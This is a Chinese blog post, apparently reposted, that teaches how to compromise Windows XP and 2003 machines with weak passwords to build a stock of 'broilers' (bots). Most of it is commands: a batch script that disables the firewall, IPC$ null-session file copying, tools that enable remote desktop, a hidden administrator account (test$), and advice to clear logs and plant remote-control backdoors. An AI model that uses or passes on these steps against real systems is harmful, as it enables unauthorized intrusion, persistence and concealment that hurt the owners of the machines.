好久不玩黑了,在网上看好多菜鸟在扫肉鸡,抱怨扫不到135 !现在都是自动扫描自动传马,到现在所学的东西都是自己Google加自己总结出来的,免杀做起来比较麻烦,学习中,从不DDOS别人,不充Q币不开会员,要那么多肉鸡也没什么用,×××也不是很感兴趣。得到肉鸡的方法很多,拿SHELL提权也可以得到很多,办公室上网,拿出啊D随便扫了下,三只服务器,N只XP。方法很简单:
1、本机关闭防火墙(net stop sharedaccess) 、关闭所有杀毒软件、关闭360***防火墙
2、开通本机几项服务,将以下代码保存为x.bat执行即可!
@echo off
color c
title 开启服务
echo.
echo 开始扫描前需要检测并开启以下服务,请稍等....
echo.
sc config LmHosts start= auto
sc config RpcLocator start= auto
sc config NtlmSsp start= auto
sc config lanmanserver start= auto
sc config SharedAccess start= disabled
net start LmHosts 2>nul
net start RpcLocator 2>nul
net start NtlmSsp 2>nul
net start lanmanserver 2>nul
net stop SharedAccess >nul 2>nul
echo.
echo 开启需要的服务成功完毕!
pause
3、设置啊D网络工具包:IP可以扫本机外网的IP段,(电信,铁通,联通都会有所不同,非电信扫电信的IP要用×××代理)线程及弱口令密码
发现弱口令的,点"远程开启Telnet"(如有出现错误,不明白的可以参见啊D主页说明),Telnet连接对方的51端口,
XP的,下面双开3389:
1、关闭防火墙(net stop sharedaccess)
2、开启3389(XP3389.exe)
3、termsrvhack.dll
4、3389.bat
具体如下:
telnet X.X.192.104 51
net share
如果只开了IPC$共享,那么执行 net share c$=c:
本机cmd 下执行:net use \\X.X.192.104\ipc$ "" /u:administrator提示成功
copy xp3389.exe \\X.X.192.104\c$
copy termsrvhack.dll \\X.X.192.104\c$
Telnet肉鸡cmd下执行:net stop sharedaccess 关闭防火墙 执行xp3389.exe 提示成功
本机cmd下执行 tasklist /s X.X.192.104 /u administrator /p /svc
查看DcomLaunch, TermService的PID值,假设为:2010
编辑本机3389.bat 把对应的PID值改为2010
本机执行copy 3389.bat \\X.X.192.104\c$
Telnet下执行3389.bat提示成功,再添加管理员就ok了
net user test$ /add&net localgroup administrators test$ /add
如果本机是外网IP的话,如果net use \\X.X.192.104\ipc$ "" /u:administrator提示不成功
可以telnet下执行 tasklist /svc >1.txt
本机执行net use \\X.X.192.104 \ipc$ "" /u:administrator然后 copy \\X.X.192.104\c$ \1.txt c:\
到本机C:盘下查看,
如果扫到的是2003服务器,可以直接telnet然后执行:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d /f(可以直接开启XP 2003 的3389)
然后直接用扫到的弱口令登录,克隆?员帐号,清除日志,留个SHIT后门或鸽子之类的远控也可以
如果执行以上代码连接不了3389可以Telnet下执行:
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber (查看端口,默认的是3389)如果不是3389 d3d,把查到的十六进制数据用科学计算器转换下就OK了!
三个文件,网上找!
刚开的这台,下线了
换一台
转载于:https://blog.51cto.com/4276359/761309